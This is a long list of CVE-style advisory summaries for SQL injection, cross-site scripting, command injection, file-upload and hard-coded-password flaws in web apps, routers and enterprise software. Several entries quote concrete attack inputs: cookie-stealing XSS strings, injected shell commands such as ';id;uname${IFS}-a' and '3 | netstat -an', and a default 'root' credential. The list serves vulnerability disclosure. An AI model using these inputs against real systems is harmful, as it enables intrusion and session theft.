An Improperly Controlled Sequential Memory Allocation vulnerability in the Juniper Networks Deep Packet Inspection-Decoder (JDPI-Decoder) Application Signature component of Junos OS's AppID service on SRX Series devices will stop the JDPI-Decoder from identifying dynamic application traffic, allowing an unauthenticated network-based attacker to send traffic to the target device using the JDPI-Decoder, designed to inspect dynamic application traffic and take action upon this traffic, to instead begin to not take action and to pass the traffic through. An example session can be seen by running the following command and evaluating the output. user@device# run show security flow session source-prefix &lt;address/mask&gt; extensive Session ID: &lt;session ID&gt;, Status: Normal, State: Active Policy name: &lt;name of policy&gt; Dynamic application: junos:UNKNOWN, &lt;&lt;&lt;&lt;&lt; LOOK HERE Please note, the JDPI-Decoder and the AppID SigPack are both affected and both must be upgraded along with the operating system to address the matter. By default, none of this is auto-enabled for automatic updates. This issue affects: Juniper Networks any version of the JDPI-Decoder Engine prior to version 5.7.0-47 with the JDPI-Decoder enabled using any version of the AppID SigPack prior to version 1.550.2-31 (SigPack 3533) on Junos OS on SRX Series: All versions prior to 19.1R3-S10; 19.2 versions prior to 19.2R3-S7; 19.3 versions prior to 19.3R3-S8; 19.4 versions prior to 19.4R3-S11; 20.1 version 20.1R1 and later versions prior to 20.2R3-S7; 20.3 version 20.3R1 and later versions prior to 20.4R3-S6; 21.1 versions prior to 21.1R3-S5; 21.2 versions prior to 21.2R3-S4; 21.3 versions prior to 21.3R3-S3; 21.4 versions prior to 21.4R3-S3; 22.1 versions prior to 22.1R3-S1; 22.2 versions prior to 22.2R2-S1, 22.2R3; 22.3 versions prior to 22.3R1-S2, 22.3R2;
A vulnerability, which was classified as problematic, was found in PHPOK 6.4.100. This affects an unknown part of the file /admin.php?c=upload&amp;f=zip&amp;_noCache=0.1683794968. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-229953 was assigned to this vulnerability.
Nextcloud Server is an open source personal cloud server. Nextcloud Server 24.0.0 until 24.0.6 and 25.0.0 until 25.0.4, as well as Nextcloud Enterprise Server 23.0.0 until 23.0.11, 24.0.0 until 24.0.6, and 25.0.0 until 25.0.4, have an information disclosure vulnerability. A user was able to get the full data directory path of the Nextcloud server from an API endpoint. By itself this information is not problematic as it can also be guessed for most common setups, but it could speed up other unknown attacks in the future if the information is known. Nextcloud Server 24.0.6 and 25.0.4 and Nextcloud Enterprise Server 23.0.11, 24.0.6, and 25.0.4 contain patches for this issue. There are no known workarounds.
A vulnerability was found in SourceCodester Theme Park Ticketing System 1.0. It has been classified as critical. This affects an unknown part of the file print_ticket.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229821 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Jewelry Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file customer.php of the component POST Parameter Handler. The manipulation of the argument Custid leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229820.
A vulnerability has been found in Simple Design Daily Journal 1.012.GP.B on Android and classified as problematic. Affected by this vulnerability is an unknown functionality of the component SQLite Database. The manipulation leads to cleartext storage in a file or on disk. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229819.
A vulnerability, which was classified as problematic, was found in SiteServer CMS up to 7.2.1. Affected is an unknown function of the file /api/stl/actions/search. The manipulation of the argument ajaxDivId leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-229818 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Class Scheduling System 1.0 and classified as problematic. This vulnerability affects unknown code of the file search_teacher_result.php of the component POST Parameter Handler. The manipulation of the argument teacher leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229612.
A vulnerability was found in SourceCodester Dental Clinic Appointment Reservation System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/service.php of the component POST Parameter Handler. The manipulation of the argument service leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-229598 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Class Scheduling System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/edit_subject.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229597 was assigned to this vulnerability.
A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-229596.
A vulnerability classified as critical was found in SourceCodester Online Jewelry Store 1.0. Affected by this vulnerability is an unknown functionality of the file supplier.php of the component POST Parameter Handler. The manipulation of the argument suppid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229429 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Class Scheduling System 1.0. Affected is an unknown function of the file /admin/save_teacher.php of the component POST Parameter Handler. The manipulation of the argument Academic_Rank leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229428.
OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions prior to 3.1.7 and 3.2.4 have a potential issue in `msg_translator.c:2628` which might lead to a server crash. This issue was found while fuzzing the function `build_res_buf_from_sip_req` but could not be reproduced against a running instance of OpenSIPS. This issue could not be exploited against a running instance of OpenSIPS since no public function was found to make use of this vulnerable code. Even in the case of exploitation through unknown vectors, it is highly unlikely that this issue would lead to anything other than Denial of Service. This issue has been fixed in versions 3.1.7 and 3.2.4.
A vulnerability, which was classified as problematic, has been found in cnoa OA up to 5.1.1.5. Affected by this issue is some unknown functionality of the file /index.php?app=main&amp;func=passport&amp;action=login. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229376. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in TOTOLINK N200RE 9.3.5u.6255_B20211224. Affected is an unknown function of the file /squashfs-root/etc_ro/custom.conf of the component Telnet Service. The manipulation leads to password in configuration file. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-229374 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in code-projects Simple Photo Gallery 1.0. It has been declared as critical. This vulnerability affects unknown code. The manipulation leads to unrestricted upload. The attack can be initiated remotely. VDB-229282 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Bus Dispatch and Information System 1.0. It has been classified as critical. This affects an unknown part of the file adminHome.php. The manipulation of the argument reach_city leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229281 was assigned to this vulnerability.
A vulnerability was found in code-projects Bus Dispatch and Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file view_branch.php. The manipulation of the argument branchid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229280.
A vulnerability has been found in code-projects Bus Dispatch and Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file view_admin.php. The manipulation of the argument adminid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229279.
A vulnerability, which was classified as critical, was found in SourceCodester Budget and Expense Tracker System 1.0. Affected is an unknown function of the file /admin/budget/manage_budget.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-229278 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Exam System 1.0. This issue affects some unknown processing of the file /jurusanmatkul/data. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229277 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Exam System 1.0. This vulnerability affects unknown code of the file /kelasdosen/data. The manipulation of the argument columns[1][data] leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229276.
A vulnerability classified as critical has been found in SourceCodester Service Provider Management System 1.0. This affects an unknown part of the file /classes/Master.php?f=delete_service. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229275.
A vulnerability was found in Sucms 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file admin_ads.php?action=add. The manipulation of the argument intro leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-229274 is the identifier assigned to this vulnerability.
A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Weaver OA up to 9.5 and classified as problematic. This vulnerability affects unknown code of the file /E-mobile/App/System/File/downfile.php. The manipulation of the argument url leads to absolute path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-229270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
The Cloudflare WARP client for Windows assigns loopback IPv4 addresses for the DNS Servers, since WARP acts as local DNS server that performs DNS queries in a secure manner, however, if a user is connected to WARP over an IPv6-capable network, te WARP client did not assign loopback IPv6 addresses but Unique Local Addresses, which under certain conditions could point towards unknown devices in the same local network which enables an Attacker to view DNS queries made by the device.
libmemcached-awesome is an open source C/C++ client library and tools for the memcached server. `libmemcached` could return data for a previously requested key, if that previous request timed out due to a low `POLL_TIMEOUT`. This issue has been addressed in version 1.1.4. Users are advised to upgrade. There are several ways to workaround or lower the probability of this bug affecting a given deployment. 1: use a reasonably high `POLL_TIMEOUT` setting, like the default. 2: use separate libmemcached connections for unrelated data. 3: do not re-use libmemcached connections in an unknown state.
A vulnerability, which was classified as problematic, has been found in SourceCodester Guest Management System 1.0. Affected by this issue is some unknown functionality of the file dateTest.php of the component GET Parameter Handler. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229160.
A vulnerability classified as problematic was found in Gira HomeServer up to 4.12.0.220829 beta. This vulnerability affects unknown code of the file /hslist. The manipulation of the argument lst with the input debug%27"&gt;&lt;img%20src=x%20onerror=alert(document.cookie)&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-229150 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in SourceCodester Lost and Found Information System 1.0. Affected by this issue is some unknown functionality of the file admin/?page=items/view_item of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228980.
A vulnerability classified as critical was found in SourceCodester Lost and Found Information System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/?page=items/manage_item of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228979.
A vulnerability classified as critical has been found in SourceCodester Online Exam System 1.0. Affected is an unknown function of the file /jurusan/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-228978 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Exam System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /matkul/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228977 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Exam System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /kelas/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228976.
A vulnerability was found in SourceCodester Online Exam System 1.0. It has been classified as critical. This affects an unknown part of the file /dosen/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228975.
A vulnerability was found in SourceCodester Online Exam System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /mahasiswa/data of the component POST Parameter Handler. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228974 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester ICT Laboratory Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file views/room_info.php of the component GET Parameter Handler. The manipulation of the argument name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228973 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Personnel Property Equipment System 1.0. Affected is an unknown function of the file admin/add_item.php of the component POST Parameter Handler. The manipulation of the argument item_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228972.
A vulnerability, which was classified as critical, has been found in SourceCodester Personnel Property Equipment System 1.0. This issue affects some unknown processing of the file admin/returned_reuse_form.php of the component GET Parameter Handler. The manipulation of the argument client_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228971.
A vulnerability classified as critical was found in SourceCodester Billing Management System 1.0. This vulnerability affects unknown code of the file editproduct.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228970 is the identifier assigned to this vulnerability.
A vulnerability was found in Caton Live up to 2023-04-26 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/ping.cgi of the component Mini_HTTPD. The manipulation of the argument address with the input ;id;uname${IFS}-a leads to command injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-228911. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester File Tracker Manager System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /file_manager/admin/save_user.php of the component POST Parameter Handler. The manipulation of the argument firstname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228892.
A vulnerability, which was classified as critical, was found in SourceCodester Covid-19 Contact Tracing System 1.0. This affects an unknown part of the file admin/establishment/manage.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228891.
A vulnerability, which was classified as critical, has been found in H3C R160 V1004004. Affected by this issue is some unknown functionality of the file /goForm/aspForm. The manipulation of the argument go leads to stack-based buffer overflow. The exploit has been disclosed to the public and may be used. VDB-228890 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. Affected is an unknown function of the file items/view.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228888.
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file classes/Master.php?f=save_inquiry of the component Contact Form. The manipulation of the argument fullname/contact/message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228887.
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/?page=user/manage_user. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228886 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been classified as critical. This affects an unknown part of the file admin/?page=categories/view_category of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228885 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file admin/. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228883.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228803.
A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This vulnerability affects unknown code of the file view_categories.php. The manipulation of the argument c leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228802 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file view_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228801 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file products.php. The manipulation of the argument c leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228800.
A vulnerability classified as problematic was found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this vulnerability is an unknown functionality of the file products.php. The manipulation of the argument search leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228799.
A vulnerability classified as critical has been found in SourceCodester AC Repair and Services System 1.0. Affected is an unknown function of the file /classes/Master.php?f=delete_service. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-228798 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Lost and Found Information System 1.0. Affected by this vulnerability is an unknown functionality of the file items/index.php. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228781 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. Affected is an unknown function of the file /classes/Master.php?f=delete_item. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228780.
A vulnerability was found in Tenda AC23 16.03.07.45_cn. It has been declared as critical. This vulnerability affects unknown code of the file /bin/ate of the component Service Port 7329. The manipulation of the argument v2 leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
XWiki Platform is a generic wiki platform. Starting in version 6.0, users with write rights can insert well-formed content that is not handled well by the parser. As a consequence, some pages becomes unusable, including the user index (if the page containing the faulty content is a user page) and the page index. Note that on the page, the normal UI is completely missing and it is not possible to open the editor directly to revert the change as the stack overflow is already triggered while getting the title of the document. This means that it is quite difficult to remove this content once inserted. This has been patched in XWiki 13.10.10, 14.4.6, and 14.9-rc-1. A temporary workaround to avoid Stack Overflow errors is to increase the memory allocated to the stack by using the `-Xss` JVM parameter (e.g., `-Xss32m`). This should allow the parser to pass and to fix the faulty content. The consequences for other aspects of the system (e.g., performance) are unknown, and this workaround should be only be used as a temporary solution. The workaround does not prevent the issue occurring again with other content. Consequently, it is strongly advised to upgrade to a version where the issue has been patched.
A vulnerability was found in Weaver E-Office 9.5 and classified as critical. Affected by this issue is some unknown functionality of the file /webroot/inc/utility_all.php of the component File Upload Handler. The manipulation leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228776. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in TP-Link Archer C7v2 v2_en_us_180114 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component GET Request Parameter Handler. The manipulation leads to denial of service. The attack can only be done within the local network. The associated identifier of this vulnerability is VDB-228775. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in USR USR-G806 1.0.41. Affected is an unknown function of the component Web Management Page. The manipulation of the argument username/password with the input root leads to use of hard-coded password. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-228774 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in DigitalPersona FPSensor 1.0.0.1. This issue affects some unknown processing of the file C:\Program Files (x86)\FPSensor\bin\DpHost.exe. The manipulation leads to unquoted search path. Attacking locally is a requirement. The identifier VDB-228773 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester File Tracker Manager System 1.0. This vulnerability affects unknown code of the file register/update_password.php of the component POST Parameter Handler. The manipulation of the argument new_password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228772.
A vulnerability classified as critical has been found in SourceCodester Online Exam System 1.0. This affects an unknown part of the file adminpanel/admin/facebox_modal/updateCourse.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228771.
A vulnerability was found in SourceCodester Online Internship Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin/login.php of the component POST Parameter Handler. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228770 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Reviewer System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /reviewer/system/system/admins/manage/users/user-update.php of the component GET Parameter Handler. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228398 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Billing Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file ajax_service.php of the component POST Parameter Handler. The manipulation of the argument drop_services leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228397 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the component Registration. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-228396.
A vulnerability has been found in SourceCodester Multi Language Hotel Management Software 1.0 and classified as problematic. This vulnerability affects unknown code of the file ajax.php of the component POST Parameter Handler. The manipulation of the argument complaint_type with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-228172.
A vulnerability was found in jja8 NewBingGoGo up to 2023.5.5.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228167.
Apollo is a configuration management system. Prior to version 2.1.0, a low-privileged user can create a special web page. If an authenticated portal admin visits this page, the page can silently send a request to assign new roles for that user without any confirmation from the Portal admin. Cookie SameSite strategy was set to Lax in version 2.1.0. As a workaround, avoid visiting unknown source pages.
A vulnerability classified as critical has been found in Control iD RHiD 23.3.19.0. This affects an unknown part of the file /v2/#/. The manipulation leads to direct request. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-228015. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Weaver E-Office 9.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file App/Ajax/ajax.php?action=mobile_upload_save. The manipulation of the argument upload_quwan leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-228014 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Chengdu VEC40G 3.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /send_order.cgi?parameter=access_detect of the component Network Detection. The manipulation of the argument COUNT with the input 3 | netstat -an leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228013 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in NEXTU NEXT-7004N 3.0.1. It has been classified as problematic. Affected is an unknown function of the file /boafrm/formFilter of the component POST Request Handler. The manipulation of the argument url with the input &lt;svg onload=alert(1337)&gt; leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-228012. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Caton Prime 2.1.2.51.e8d7225049(202303031001) and classified as critical. This issue affects some unknown processing of the file cgi-bin/tools_ping.cgi?action=Command of the component Ping Handler. The manipulation of the argument Destination leads to command injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-228011. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Caton CTP Relay Server 1.2.9 and classified as critical. This vulnerability affects unknown code of the file /server/api/v1/login of the component API. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. VDB-228010 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Dromara J2eeFAST up to 2.6.0. It has been classified as problematic. Affected is an unknown function of the component Announcement Handler. The manipulation of the argument &amp;#31995;&amp;#32479;&amp;#24037;&amp;#20855;/&amp;#20844;&amp;#21578;&amp;#31649;&amp;#29702; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 7a9e1a00e3329fdc0ae05f7a8257cce77037134d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-227868.
A vulnerability was found in Dromara J2eeFAST up to 2.6.0 and classified as problematic. This issue affects some unknown processing of the component System Message Handler. The manipulation of the argument &amp;#20027;&amp;#39064; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The patch is named 7a9e1a00e3329fdc0ae05f7a8257cce77037134d. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-227867.
A vulnerability has been found in Rebuild 3.2 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-227866 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online DJ Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/bookings/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227795.
A vulnerability was found in SourceCodester Simple Student Information System 1.0. It has been classified as problematic. This affects an unknown part of the file /classes/Master.php?f=save_course of the component Add New Course. The manipulation of the argument name with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227751.
A vulnerability classified as problematic has been found in Control iD RHiD 23.3.19.0. Affected is an unknown function of the file /v2/#/add/department. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-227718 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Konga 2.8.3 on Kong. It has been classified as problematic. This affects an unknown part of the component Login API. The manipulation leads to insufficiently random values. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. The associated identifier of this vulnerability is VDB-227715.
A vulnerability was found in ks-soft Advanced Host Monitor up to 12.56 and classified as problematic. Affected by this issue is some unknown functionality of the file C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe. The manipulation leads to unquoted search path. It is possible to launch the attack on the local host. Upgrading to version 12.60 is able to address this issue. It is recommended to upgrade the affected component. VDB-227714 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/bookings/manage_booking.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227707.
A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227706 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/inquiries/view_inquiry.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227705 was assigned to this vulnerability.
